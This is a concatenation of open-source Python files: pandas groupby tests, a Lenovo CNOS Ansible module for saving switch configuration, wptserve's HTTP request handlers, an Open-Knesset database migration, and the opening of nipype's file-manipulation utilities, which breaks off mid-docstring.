count_not_as = df.groupby('A', as_index=False).count()
expected = DataFrame([[1, 2], [0, 0]], columns=['B', 'C'],
index=[1, 3])
expected.index.name = 'A'
tm.assert_frame_equal(count_not_as, expected.reset_index())
tm.assert_frame_equal(count_as, expected)
count_B = df.groupby('A')['B'].count()
tm.assert_series_equal(count_B, expected['B'])
def test_count_object():
df = pd.DataFrame({'a': ['a'] * 3 + ['b'] * 3, 'c': [2] * 3 + [3] * 3})
result = df.groupby('c').a.count()
expected = pd.Series([
3, 3
], index=pd.Index([2, 3], name='c'), name='a')
tm.assert_series_equal(result, expected)
df = pd.DataFrame({'a': ['a', np.nan, np.nan] + ['b'] * 3,
'c': [2] * 3 + [3] * 3})
result = df.groupby('c').a.count()
expected = pd.Series([
1, 3
], index=pd.Index([2, 3], name='c'), name='a')
tm.assert_series_equal(result, expected)
def test_count_cross_type():
# GH8169
vals = np.hstack((np.random.randint(0, 5, (100, 2)), np.random.randint(
0, 2, (100, 2))))
df = pd.DataFrame(vals, columns=['a', 'b', 'c', 'd'])
df[df == 2] = np.nan
expected = df.groupby(['c', 'd']).count()
for t in ['float32', 'object']:
df['a'] = df['a'].astype(t)
df['b'] = df['b'].astype(t)
result = df.groupby(['c', 'd']).count()
tm.assert_frame_equal(result, expected)
def test_lower_int_prec_count():
df = DataFrame({'a': np.array(
[0, 1, 2, 100], np.int8),
'b': np.array(
[1, 2, 3, 6], np.uint32),
'c': np.array(
[4, 5, 6, 8], np.int16),
'grp': list('ab' * 2)})
result = df.groupby('grp').count()
expected = DataFrame({'a': [2, 2],
'b': [2, 2],
'c': [2, 2]}, index=pd.Index(list('ab'),
name='grp'))
tm.assert_frame_equal(result, expected)
def test_count_uses_size_on_exception():
class RaisingObjectException(Exception):
pass
class RaisingObject(object):
def __init__(self, msg='I will raise inside Cython'):
super(RaisingObject, self).__init__()
self.msg = msg
def __eq__(self, other):
# gets called in Cython to check that raising calls the method
raise RaisingObjectException(self.msg)
df = DataFrame({'a': [RaisingObject() for _ in range(4)],
'grp': list('ab' * 2)})
result = df.groupby('grp').count()
expected = DataFrame({'a': [2, 2]}, index=pd.Index(
list('ab'), name='grp'))
tm.assert_frame_equal(result, expected)
# size
# --------------------------------
def test_size(df):
grouped = df.groupby(['A', 'B'])
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
grouped = df.groupby('A')
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
grouped = df.groupby('B')
result = grouped.size()
for key, group in grouped:
assert result[key] == len(group)
df = DataFrame(np.random.choice(20, (1000, 3)), columns=list('abc'))
for sort, key in cart_product((False, True), ('a', 'b', ['a', 'b'])):
left = df.groupby(key, sort=sort).size()
right = df.groupby(key, sort=sort)['c'].apply(lambda a: a.shape[0])
tm.assert_series_equal(left, right, check_names=False)
# GH11699
df = DataFrame([], columns=['A', 'B'])
out = Series([], dtype='int64', index=Index([], name='A'))
tm.assert_series_equal(df.groupby('A').size(), out)
# pipe
# --------------------------------
def test_pipe():
# Test the pipe method of DataFrameGroupBy.
# Issue #17871
random_state = np.random.RandomState(1234567890)
df = DataFrame({'A': ['foo', 'bar', 'foo', 'bar',
'foo', 'bar', 'foo', 'foo'],
'B': random_state.randn(8),
'C': random_state.randn(8)})
def f(dfgb):
return dfgb.B.max() - dfgb.C.min().min()
def square(srs):
return srs ** 2
# Note that the transformations are
# GroupBy -> Series
# Series -> Series
# This then chains the GroupBy.pipe and the
# NDFrame.pipe methods
result = df.groupby('A').pipe(f).pipe(square)
index = Index([u'bar', u'foo'], dtype='object', name=u'A')
expected = pd.Series([8.99110003361, 8.17516964785], name='B',
index=index)
tm.assert_series_equal(expected, result)
def test_pipe_args():
# Test passing args to the pipe method of DataFrameGroupBy.
# Issue #17871
df = pd.DataFrame({'group': ['A', 'A', 'B', 'B', 'C'],
'x': [1.0, 2.0, 3.0, 2.0, 5.0],
'y': [10.0, 100.0, 1000.0, -100.0, -1000.0]})
def f(dfgb, arg1):
return (dfgb.filter(lambda grp: grp.y.mean() > arg1, dropna=False)
.groupby(dfgb.grouper))
def g(dfgb, arg2):
return dfgb.sum() / dfgb.sum().sum() + arg2
def h(df, arg3):
return df.x + df.y - arg3
result = (df
.groupby('group')
.pipe(f, 0)
.pipe(g, 10)
.pipe(h, 100))
# Assert the results here
index = pd.Index(['A', 'B', 'C'], name='group')
expected = pd.Series([-79.5160891089, -78.4839108911, -80],
index=index)
tm.assert_series_equal(expected, result)
# test SeriesGroupby.pipe
ser = pd.Series([1, 1, 2, 2, 3, 3])
result = ser.groupby(ser).pipe(lambda grp: grp.sum() * grp.count())
expected = pd.Series([4, 8, 12], index=pd.Int64Index([1, 2, 3]))
tm.assert_series_equal(result, expected)
def test_groupby_mean_no_overflow():
# Regression test for (#22487)
df = pd.DataFrame({
"user": ["A", "A", "A", "A", "A"],
"connections": [4970, 4749, 4719, 4704, 18446744073699999744]
})
assert df.groupby('user')['connections'].mean()['A'] == 3689348814740003840
| bsd-3-clause |
HuaweiSwitch/ansible | lib/ansible/modules/network/lenovo/cnos_save.py | 59 | 5059 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to save running config to start up config to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_save
author: "Dave Kasberg (@dkasberg)"
short_description: Save the running configuration as the startup configuration on devices running Lenovo CNOS
description:
- This module allows you to copy the running configuration of a switch over its startup configuration.
It is recommended to use this module shortly after any major configuration changes so they persist after
a switch restart. This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
    that must be created by the user in the local directory from which the playbook is run.
    For more information about this module from Lenovo and customizing its usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_save.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_save. These are written in the main.yml file of the tasks directory.
---
- name: Test Save
cnos_save:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_save_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Switch Running Config is Saved to Startup Config"
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save memory \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
    # Automatically add untrusted hosts (make sure this is acceptable under your environment's security policy)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Switch Running Config is Saved to Startup Config ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| gpl-3.0 |
DDEFISHER/servo | tests/wpt/web-platform-tests/tools/wptserve/wptserve/handlers.py | 44 | 13193 | import cgi
import json
import os
import traceback
import urllib
import urlparse
from constants import content_types
from pipes import Pipeline, template
from ranges import RangeParser
from request import Authentication
from response import MultipartContent
from utils import HTTPException
__all__ = ["file_handler", "python_script_handler",
"FunctionHandler", "handler", "json_handler",
"as_is_handler", "ErrorHandler", "BasicAuthHandler"]
def guess_content_type(path):
ext = os.path.splitext(path)[1].lstrip(".")
if ext in content_types:
return content_types[ext]
return "application/octet-stream"
def filesystem_path(base_path, request, url_base="/"):
if base_path is None:
base_path = request.doc_root
path = urllib.unquote(request.url_parts.path)
if path.startswith(url_base):
path = path[len(url_base):]
if ".." in path:
raise HTTPException(404)
new_path = os.path.join(base_path, path)
# Otherwise setting path to / allows access outside the root directory
if not new_path.startswith(base_path):
raise HTTPException(404)
return new_path
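# Illustrative behaviour (a sketch based only on the function above): with
# request.doc_root == "/srv/wpt" and request.url_parts.path == "/a/b.html",
# filesystem_path(None, request) returns "/srv/wpt/a/b.html"; any requested
# path containing ".." raises HTTPException(404) before the filesystem is touched.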
class DirectoryHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __repr__(self):
return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
if not request.url_parts.path.endswith("/"):
raise HTTPException(404)
path = filesystem_path(self.base_path, request, self.url_base)
if not os.path.isdir(path):
raise HTTPException(404, "%s is not a directory" % path)
response.headers = [("Content-Type", "text/html")]
response.content = """<!doctype html>
<meta name="viewport" content="width=device-width">
<title>Directory listing for %(path)s</title>
<h1>Directory listing for %(path)s</h1>
<ul>
%(items)s
</ul>
""" % {"path": cgi.escape(request.url_parts.path),
"items": "\n".join(self.list_items(request, path))}
def list_items(self, request, path):
# TODO: this won't actually list all routes, only the
# ones that correspond to a real filesystem path. It's
# not possible to list every route that will match
# something, but it should be possible to at least list the
# statically defined ones
base_path = request.url_parts.path
if not base_path.endswith("/"):
base_path += "/"
if base_path != "/":
link = urlparse.urljoin(base_path, "..")
yield ("""<li class="dir"><a href="%(link)s">%(name)s</a></li>""" %
{"link": link, "name": ".."})
for item in sorted(os.listdir(path)):
link = cgi.escape(urllib.quote(item))
if os.path.isdir(os.path.join(path, item)):
link += "/"
class_ = "dir"
else:
class_ = "file"
yield ("""<li class="%(class)s"><a href="%(link)s">%(name)s</a></li>""" %
{"link": link, "name": cgi.escape(item), "class": class_})
directory_handler = DirectoryHandler()
class FileHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.directory_handler = DirectoryHandler(self.base_path, self.url_base)
def __repr__(self):
return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
if os.path.isdir(path):
return self.directory_handler(request, response)
try:
#This is probably racy with some other process trying to change the file
file_size = os.stat(path).st_size
response.headers.update(self.get_headers(request, path))
if "Range" in request.headers:
try:
byte_ranges = RangeParser()(request.headers['Range'], file_size)
except HTTPException as e:
if e.code == 416:
response.headers.set("Content-Range", "bytes */%i" % file_size)
raise
else:
byte_ranges = None
data = self.get_data(response, path, byte_ranges)
response.content = data
query = urlparse.parse_qs(request.url_parts.query)
pipeline = None
if "pipe" in query:
pipeline = Pipeline(query["pipe"][-1])
elif os.path.splitext(path)[0].endswith(".sub"):
ml_extensions = {".html", ".htm", ".xht", ".xhtml", ".xml", ".svg"}
escape_type = "html" if os.path.splitext(path)[1] in ml_extensions else "none"
pipeline = Pipeline("sub(%s)" % escape_type)
if pipeline is not None:
response = pipeline(request, response)
return response
except (OSError, IOError):
raise HTTPException(404)
def get_headers(self, request, path):
rv = self.default_headers(path)
rv.extend(self.load_headers(request, os.path.join(os.path.split(path)[0], "__dir__")))
rv.extend(self.load_headers(request, path))
return rv
def load_headers(self, request, path):
headers_path = path + ".sub.headers"
if os.path.exists(headers_path):
use_sub = True
else:
headers_path = path + ".headers"
use_sub = False
try:
with open(headers_path) as headers_file:
data = headers_file.read()
except IOError:
return []
else:
if use_sub:
data = template(request, data, escape_type="none")
return [tuple(item.strip() for item in line.split(":", 1))
for line in data.splitlines() if line]
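    # Illustrative sidecar format (editorial note; the file names are examples):
    # a file called foo.html.headers placed next to foo.html is parsed one
    # "Name: value" pair per line, e.g.
    #   Content-Type: text/html; charset=utf-8
    #   Cache-Control: no-store
    # while a foo.html.sub.headers variant is first run through the template
    # substitution machinery and then parsed the same way.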
def get_data(self, response, path, byte_ranges):
"""Return either the handle to a file, or a string containing
the content of a chunk of the file, if we have a range request."""
if byte_ranges is None:
return open(path, 'rb')
else:
with open(path, 'rb') as f:
response.status = 206
if len(byte_ranges) > 1:
parts_content_type, content = self.set_response_multipart(response,
byte_ranges,
f)
for byte_range in byte_ranges:
content.append_part(self.get_range_data(f, byte_range),
parts_content_type,
[("Content-Range", byte_range.header_value())])
return content
else:
response.headers.set("Content-Range", byte_ranges[0].header_value())
return self.get_range_data(f, byte_ranges[0])
def set_response_multipart(self, response, ranges, f):
parts_content_type = response.headers.get("Content-Type")
if parts_content_type:
parts_content_type = parts_content_type[-1]
else:
parts_content_type = None
content = MultipartContent()
response.headers.set("Content-Type", "multipart/byteranges; boundary=%s" % content.boundary)
return parts_content_type, content
def get_range_data(self, f, byte_range):
f.seek(byte_range.lower)
return f.read(byte_range.upper - byte_range.lower)
def default_headers(self, path):
return [("Content-Type", guess_content_type(path))]
file_handler = FileHandler()
class PythonScriptHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __repr__(self):
return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
environ = {"__file__": path}
execfile(path, environ, environ)
if "main" in environ:
handler = FunctionHandler(environ["main"])
handler(request, response)
else:
raise HTTPException(500, "No main function in script %s" % path)
except IOError:
raise HTTPException(404)
python_script_handler = PythonScriptHandler()
class FunctionHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
try:
rv = self.func(request, response)
except Exception:
msg = traceback.format_exc()
raise HTTPException(500, message=msg)
if rv is not None:
if isinstance(rv, tuple):
if len(rv) == 3:
status, headers, content = rv
response.status = status
elif len(rv) == 2:
headers, content = rv
else:
raise HTTPException(500)
response.headers.update(headers)
else:
content = rv
response.content = content
#The generic name here is so that this can be used as a decorator
def handler(func):
return FunctionHandler(func)
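# Illustrative use of the decorator (a sketch; the handler name is invented).
# FunctionHandler accepts a bare body, a (headers, body) pair, or a
# (status, headers, body) triple as the return value:
#
#   @handler
#   def pong(request, response):
#       return 200, [("Content-Type", "text/plain")], "pong"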
class JsonHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
return FunctionHandler(self.handle_request)(request, response)
def handle_request(self, request, response):
rv = self.func(request, response)
response.headers.set("Content-Type", "application/json")
enc = json.dumps
if isinstance(rv, tuple):
rv = list(rv)
value = tuple(rv[:-1] + [enc(rv[-1])])
length = len(value[-1])
else:
value = enc(rv)
length = len(value)
response.headers.set("Content-Length", length)
return value
def json_handler(func):
return JsonHandler(func)
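# Illustrative use (a sketch; the handler name is invented): the wrapped
# function returns a plain Python object, which JsonHandler serialises while
# setting the Content-Type and Content-Length headers:
#
#   @json_handler
#   def echo_path(request, response):
#       return {"path": request.url_parts.path}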
class AsIsHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
with open(path) as f:
response.writer.write_content(f.read())
response.close_connection = True
except IOError:
raise HTTPException(404)
as_is_handler = AsIsHandler()
class BasicAuthHandler(object):
def __init__(self, handler, user, password):
"""
A Basic Auth handler
:Args:
- handler: a secondary handler for the request after authentication is successful (example file_handler)
         - user: string of the valid user name, or None to accept any credentials
- password: string of the password required
"""
self.user = user
self.password = password
self.handler = handler
def __call__(self, request, response):
if "authorization" not in request.headers:
response.status = 401
response.headers.set("WWW-Authenticate", "Basic")
return response
else:
auth = Authentication(request.headers)
if self.user is not None and (self.user != auth.username or self.password != auth.password):
response.set_error(403, "Invalid username or password")
return response
return self.handler(request, response)
basic_auth_handler = BasicAuthHandler(file_handler, None, None)
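# Illustrative configuration (a sketch; the credentials are placeholders):
# wrapping the file handler so that a route only serves files to one user.
#
#   protected_files = BasicAuthHandler(file_handler, "user", "secret")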
class ErrorHandler(object):
def __init__(self, status):
self.status = status
def __call__(self, request, response):
response.set_error(self.status)
class StaticHandler(object):
def __init__(self, path, format_args, content_type, **headers):
"""Hander that reads a file from a path and substitutes some fixed data
:param path: Path to the template file to use
:param format_args: Dictionary of values to substitute into the template file
        :param content_type: Content type header to serve the response with
        :param headers: Extra headers to send with responses, passed as keyword arguments"""
with open(path) as f:
self.data = f.read() % format_args
self.resp_headers = [("Content-Type", content_type)]
for k, v in headers.iteritems():
            self.resp_headers.append((k.replace("_", "-"), v))
self.handler = handler(self.handle_request)
def handle_request(self, request, response):
return self.resp_headers, self.data
def __call__(self, request, response):
rv = self.handler(request, response)
return rv
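# Illustrative instantiation (a sketch; the path and substitutions are made up):
# serve a %-style template with fixed values and an extra response header
# (underscores in keyword names are translated to dashes).
#
#   static_page = StaticHandler("/srv/templates/page.html",
#                               {"title": "Example"},
#                               "text/html",
#                               Cache_Control="no-store")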
| mpl-2.0 |
alonisser/Open-Knesset | persons/migrations/0001_initial.py | 15 | 12661 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Title'
db.create_table('persons_title', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
))
db.send_create_signal('persons', ['Title'])
# Adding model 'Person'
db.create_table('persons_person', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('mk', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='person', null=True, to=orm['mks.Member'])),
))
db.send_create_signal('persons', ['Person'])
# Adding M2M table for field titles on 'Person'
db.create_table('persons_person_titles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('person', models.ForeignKey(orm['persons.person'], null=False)),
('title', models.ForeignKey(orm['persons.title'], null=False))
))
db.create_unique('persons_person_titles', ['person_id', 'title_id'])
# Adding model 'Role'
db.create_table('persons_role', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('text', self.gf('django.db.models.fields.CharField')(max_length=1024, null=True, blank=True)),
('person', self.gf('django.db.models.fields.related.ForeignKey')(related_name='roles', to=orm['persons.Person'])),
))
db.send_create_signal('persons', ['Role'])
def backwards(self, orm):
# Deleting model 'Title'
db.delete_table('persons_title')
# Deleting model 'Person'
db.delete_table('persons_person')
# Removing M2M table for field titles on 'Person'
db.delete_table('persons_person_titles')
# Deleting model 'Role'
db.delete_table('persons_role')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'average_monthly_committee_presence': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'average_weekly_presence_hours': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'bills_stats_approved': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_first': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_pre': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_proposed': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'current_role_descriptions': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence_lat': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'place_of_residence_lon': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'residence_centrality': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'residence_economy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'persons.person': {
'Meta': {'object_name': 'Person'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mk': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'person'", 'null': 'True', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'titles': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'persons'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['persons.Title']"})
},
'persons.role': {
'Meta': {'object_name': 'Role'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'roles'", 'to': "orm['persons.Person']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'})
},
'persons.title': {
'Meta': {'object_name': 'Title'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '1024', 'db_index': 'True'})
}
}
complete_apps = ['persons']
| bsd-3-clause |
rameshvs/nipype | nipype/utils/filemanip.py | 3 | 12109 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
import cPickle
from glob import glob
import gzip
import hashlib
from hashlib import md5
import json
import os
import re
import shutil
import warnings
import numpy as np
from ..interfaces.traits_extension import isdefined
from .misc import is_container
from .. import logging, config
fmlogger = logging.getLogger("filemanip")
class FileNotFoundError(Exception):
pass
def split_filename(fname):
"""Split a filename into parts: path, base filename and extension.
Parameters
----------
fname : str
file or path name
Returns
-------
pth : str
base path from fname
fname : str
filename from fname, without extension
ext : str
file extension from fname
Examples
--------
>>> from nipype.utils.filemanip import split_filename
>>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
>>> pth
'/home/data'
>>> fname
'subject'
>>> ext
'.nii.gz'
"""
special_extensions = [".nii.gz", ".tar.gz"]
if fname and fname.endswith(os.path.sep):
fname = fname[:-1]
pth, fname = os.path.split(fname)
ext = None
for special_ext in special_extensions:
ext_len = len(special_ext)
if (len(fname) > ext_len) and \
(fname[-ext_len:].lower() == special_ext.lower()):
ext = fname[-ext_len:]
fname = fname[:-ext_len]
break
if not ext:
fname, ext = os.path.splitext(fname)
return pth, fname, ext
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
"""Manipulates path and name of input filename
Parameters
----------
fname : string
A filename (may or may not include path)
prefix : string
